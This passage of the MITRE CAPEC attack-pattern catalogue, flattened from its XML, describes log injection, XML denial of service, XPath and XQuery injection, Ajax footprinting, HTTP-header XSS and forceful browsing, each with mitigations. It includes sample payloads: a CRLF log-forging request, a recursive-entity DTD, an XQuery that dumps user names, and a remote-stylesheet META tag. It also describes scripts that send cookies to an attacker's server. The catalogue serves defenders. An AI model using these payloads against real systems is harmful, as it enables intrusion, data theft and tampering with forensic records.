Content The attacker launches various logged actions with malicious data to determine what sort of log injection is possible. Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc. env-Web Attacker observes content successfully injected into web logs. Attacker lacks capability to observe if content was successfully injected into web logs. Manipulate Log Files The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack. Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example: The HTTP request for "/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] "GET /forged-path HTTP/1.1" 200 - "-" USER_AGENT" may add the log line into Apache "access_log" (for example). Different applications may require different encodings of the carriage return and line feed characters. env-Web Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example: The HTTP request for "/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] "GET /forged-path HTTP/1.1" 200 - "-" USER_AGENT" may add the log line into Apache "access_log" (for example). Different applications may require different encodings of the carriage return and line feed characters. env-Web Directly through log file or database manipulation, modify existing log entries. env-Web Forged entry or other malicious data inserted into application's logs. No entry inserted into logs, or the entry is visibly distinguishable from real entries. Input validation to ensure that only legal characters supplied by users can be entered into log files Encode information from user such that any unexpected characters are encoded safely before they are entered into log files. Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however. Target server software must be a HTTP server that performs web logging. High Medium Modification of Resources Time and State Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network. Low To input faked entries into Web logs Ability to send specially formatted HTTP request to web server Design: Use input validation before writing to web log Design: Validate all log data before it is output Integrity Modify application data Forged log entry delivered through HTTP Request. HTTP request Web log, log reporting systems Log data contains data designed to trick administrators and auditors as to chain of events. Limit ability to conduct forensics and other investigations/responses. 117 Targeted 93 Targeted 92 Targeted 221 Targeted 96 Secondary 20 Secondary 150 Secondary 276 Targeted 279 Secondary 116 Secondary 713 Targeted 1000 Attack Pattern ChildOf 268 Obfuscation Medium High Medium Client-Server SOA All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.81.1][REF-2] Cigital, Inc 2007-01-01 [R.81.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases XML Denial of Service (XDoS) can be applied to any technology that utilizes XML data. This is, of course, most distributed systems technology including Java, .Net, databases, and so on. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. There are three primary attack vectors that XDoS can navigate Target CPU through recursion: attacker creates a recursive payload and sends to service provider Target memory through jumbo payloads: service provider uses DOM to parse XML. DOM creates in memory representation of XML document, but when document is very large (for example, north of 1 Gb) service provider host may exhaust memory trying to build memory objects. XML Ping of death: attack service provider with numerous small files that clog the system. All of the above attacks exploit the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends. Attacker must be able to send a malicious XML payload to host, such as SOAP or REST web service. Very High High Injection Several commercial XML parsers were found to be vulnerable to XDoS through XML recursion attacks. The code fragment below is self-referencing and can result in the parser exhausting all CPU and/or memory available to it. <!DOCTYPE evildoc [ <!ENTITY x0 hello XDoS"> <!ENTITY xevilparam &x99;&x99;"> ]> <foobar>&xevilparam;</foobar> By the time the service provider validates the DTD elements it is too late, because the validation routines references itself. SOAP messages are no longer allowed to accept DTDs, however there is nothing to stop developers of other applications or custom SOAP implementations from bypassing this concern. Low Crafting malicious XML content and injecting it through standard interfaces Design: Utilize a Security Pipeline Interface (SPI) to mediate communications between service requester and service provider The SPI should be designed to throttle up and down and handle a variety of payloads. Design: Utilize clustered and fail over techniques, leverage network transports to provide availability such as HTTP load balancers Implementation: Check size of XML message before parsing Availability DoS: resource consumption (memory) Denial of Service XML-capable system interfaces Maliciously crafted XML XML inspection, parsing and validation routines Denial of Service 674 Targeted 400 Targeted 770 Targeted 1000 Category ChildOf 119 Exploitation Low Medium High Client-Server SOA All All All Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that he normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database. In order to successfully inject XML and retrieve information from a database, an attacker: Determines the user-controllable input that is used without proper validation as part of XPath queries Determines the structure of queries that accept such input Crafts malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries. XPath queries used to retrieve information stored in XML documents User-controllable input not properly sanitized before being used as part of XPath queries High High Injection Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass. Low XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection None The attacker tries to inject characters that can cause an XPath error, such as single-quote ('), or content that may cause a malformed XPath expression. If the injection of such content into the input causes an XPath error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of XPath expressions used in queries. Too many exceptions generated by the application as a result of malformed XPath queries Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions. Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data User-controllable input used as part of dynamic XPath queries XPath expressions intended to defeat checks run by XPath queries XML database The impact of payload activation is that it is interpreted as part of the XPath expression used in the query, thus enabling an attacker to modify the expression used by the query. 91 Targeted 74 Secondary 20 Secondary 390 Secondary 713 Targeted 707 Targeted 1000 Attack Pattern ChildOf 250 333 Category HasMember 372 1000 Attack Pattern ChildOf 250 Special characters in user-controllable input must be escaped before use by the application. Only use parameterized XPath expressions to query the XML database. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Reluctance to Trust Failing Securely Defense in Depth Never Use Input as Part of a Directive to any Internal Component Handle All Errors Safely Penetration Exploitation High High Medium Client-Server SOA All All All Common Weakness Enumeration (CWE) CWE-91 - XML Injection Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/91.html Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Common Weakness Enumeration (CWE) CWE-390 - Improper Error Handling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/390.html Chiradeep B Chhaya 2007-01-30 Second Draft Chiradeep B Chhaya 2007-01-30 Second Draft Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Indicators-Warnings_of_Attack This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources. Survey the application for user-controllable inputs Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all user input entry points visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Determine user-controllable input susceptible to injection Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax. Use web browser to inject input through text fields or through HTTP GET parameters. env-Web Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc. env-Web Use XML files to inject input. env-Web env-ClientServer env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use network-level packet injection tools such as netcat to inject input env-Web env-ClientServer env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use modified client (modified by reverse engineering) to inject input. env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the XQL query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. Search for and alert on unexpected XQL keywords in application logs. Input validation of user-controlled data before including it in an XQL query Information Disclosure The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information. Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it. env-Web The attacker gets information from the XML database. Monitor server logs for suspicious XQuery requests. Use appropriate input validation to filter XQL syntax in user-controllable inputs. Do not use user-controllable input as part of XQL queries. Manipulate the data in the XML database The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data. Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database. env-Web The attacker gets the XQuery engine to insert or modify data in the database. This is mainly used to either insert wrong data or to insert persistent attack payloads (XSS for instance) that will be sent to other users' browser. Monitor server logs for consecutive suspicious request to the XML database. Use appropriate input validation to filter XQL syntax in user-controllable inputs. Do not use user-controllable input as part of XQL queries. The XQL must execute unvalidated data Very High High Injection An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[Name='*'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL. Low Basic understanding of XQuery Design: Perform input white list validation on all XML input Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL. Integrity Modify application data Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code XML-capable system interfaces XQuery syntax XQL commands 74 Targeted 713 Targeted 707 Targeted 1000 Attack Pattern ChildOf 250 333 Category HasMember 379 1000 Attack Pattern ChildOf 250 Penetration Exploitation High High High Client-Server SOA All All All Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Sean Barnum Cigital, Inc 2007-03-07 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. In many XSS attacks the attacker must get a "hole in one" and successfully exploit the vulnerability on the victim side the first time, once the client is redirected the attacker has many chances to engage in follow on probes, but there is only one first chance. In a widely used web application this is not a major problem because 1 in a 1,000 is good enough in a widely used application. A common first step for an attacker is to footprint the environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The user must allow JavaScript to execute in their browser Very High High Protocol Manipulation Injection Brute Force Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. By appending a malicious script to an otherwise normal looking URL, the attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute additional javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks). Medium To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Confidentiality Read application data Payload delivered through standard communication protocols, such as Ajax application. Command(s) executed directly on host Client machine and client network Enables attacker to execute probes against client system. 79 Targeted 113 Targeted 348 Targeted 96 Targeted 20 Targeted 116 Targeted 184 Secondary 86 Secondary 712 Targeted 692 Targeted 1000 Attack Pattern ChildOf 169 Reconnaissance High Low Low Client-Server SOA All All AJAX Shreeraj Shah Ajax fingerprinting for Web 2.0 Applications Help Net Security http://www.net-security.org/dl/articles/Ajax_fingerprinting.pdf Gunnar Peterson 2007-02-28 Gunnar Peterson 2007-02-28 Sean Barnum Cigital, Inc 2007-03-07 Review and revise Sean Barnum Cigital, Inc 2007-03-07 Review and revise CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Solutions_and_Mitigations An attack of this type exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications. Spider Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.) Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers. env-Web Look for HTML meta tags that could be injectable env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Web content is generated by the application and served to the browser based on user-controllable inputs. env-Web HTTP header variables are used by the application or the browser (DOM) env-Web No HTTP variables appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding HTTP variables is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe identified potential entry points for XSS vulnerability The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. He records all the responses from the server that include unmodified versions of his script. The attacker tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response. Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed. env-Web Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed. env-Web Use a proxy tool to record results of manual input of XSS probes in known URLs. env-Web User-controllable input is embedded as part of generated HTTP headers env-Web Input parameters become part of the web page (even in meta tags) env-Web Output to the browser is not encoded to remove executable scripting syntax. env-Web Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS. env-Web The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.) All HTML-sensitive characters are consistently re-encoded before being sent to the web browser. Some sensitive characters are consistently encoded, but others are not. Monitor input to web servers (not only GET, but all in the inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Do not embed user-controllable input generated HTTP headers Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target software must be a client that allows scripting communication from remote hosts, and attacker must control a remote site of some sort to redirect client and data to. Very High High Injection Modification of Resources Protocol Manipulation Utilize a remote style sheet set in the HTTP header for XSS attack. When the attacker is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote attacker. Like most XSS attacks, results vary depending on browser that is used. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> [R.86.2] Google's 404 redirection script was found vulnerable to this attack vector. Google's 404 file not found page read * Response headers: "Content-Type: text/html; charset=[encoding]". * Response body: <META http-equiv="Content-Type" (...) charset=[encoding]/> If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [R.86.3] XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host. Low To achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine. High Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process. Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Session tokens for specific host Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Malicious input delivered through HTTP Headers. Varies with instantiation of attack pattern. In the case of HTTP headers they may not be visible to the end user via a browser Header processing on the server or Client browser Enables attacker to execute scripts to launch attacks on server as well as remote client machine and environment 79 Targeted 184 Secondary 348 Targeted 96 Targeted 20 Targeted 116 Targeted 86 Secondary 692 Targeted 697 Targeted 713 Targeted 71 Targeted CVE-2006-5442 ViewVC 1.0.2 and earlier does not specify a charset in its HTTP headers or HTML documents, which allows remote attackers to conduct cross-site scripting (XSS) attacks that inject arbitrary UTF-7 encoded JavaScript code via a view. CVE-2006-3918 http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file. 1000 Attack Pattern ChildOf 18 1000 Attack Pattern ChildOf 220 Penetration Exploitation High High High Client-Server SOA All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 OWASP Cheatsheets XSS Filter Evasion Cheat Sheet The Open Web Application Security Project (OWASP) http://ha.ckers.org/xss.html Watchfire Research XSS vulnerabilities in Google.com Full Disclosure mailing list archives Dec 21 2005 http://seclists.org/fulldisclosure/2005/Dec/1107 [R.86.1][REF-2] Cigital, Inc 2007-01-01 [R.86.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected. Spider Using an automated tool, an attacker follows all public links on a web site. He records all the links he finds. Use a spidering tool to follow and record all links env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web A list of links is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt well-known or guessable resource locations Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. He records all the positive responses from the server. Use a spidering tool to follow and record attempts on well-known URLs env-Web Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs. env-Web Common resource identifiers are used (e.g., /admin/, admin.jsp, admin.aspx, etc.) env-Web Well-known middleware or application platforms are used (e.g., Cold Fusion, WebSphere, WebLogic, JBoss, etc.) env-Web The attacker discovers one or more unprotected resources. Monitor errors (e.g., 404 not found) from web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on an unusual number of consecutive failures or total failures from a single host. Potentially alert on many failures from many different hosts, but in a relatively short time window. Create "honeypot" web pages or scripts that do not actually have any use in the application, and name them common names (e.g., admin.jsp, admin.do, admin.aspx, etc.). Alert when one of these resources is requested. Actively monitor the application and either deny or redirect requests from origins that appear to be generating an unusual amount of failures. Obtain a list of sensitive areas that should not be directly accessible (e.g., JSPs or other templates that should only be accessible via front controllers). Apply an external mechanism (rule in the load balancer, rule in the reverse proxy, etc.) to intercept and redirect requests for those resources. Ideally use patterns, not specific page names (e.g., /jsp/* instead of a list of individual JSPs). Regularly update the list that is used in operation. Identify defaults for platform-specific sensitive resources. If the application does not use those defaults, alert on all requests for them (e.g., http://server:8080/admin/) Use unauthorized resources By visiting the unprotected resource, the attacker makes use of unauthorized functionality. Access unprotected functions and execute them. env-All Malformed log entries are a common side-effect of this kind of attack. E.g., "User xyz deleted by on 10/16/07." The "by on" indicates that no authorized user was recorded. (A good entry would say "user xyz deleted by admin on 10/16/07"). Monitoring of log file entries for correct and consistent output format can indicate this kind of attack succeeding. View unauthorized data The attacker discovers and views unprotected sensitive data. Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.) env-Web Dynamic pages (JSP, ASP, PHP, etc.) exist that divulge sensitive data without first checking authorization. env-Web The forcibly browseable pages or accessible resources must be discoverable and improperly protected. High Very High A number of automated crawlers as well as other tools are available that generally perform a good job at looking for forcefully browseable pages Brute Force A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group. An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role. Low Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult A directory listing is helpful but not a requirement. No special resources are required. Following all the links recursively reveals resources that are 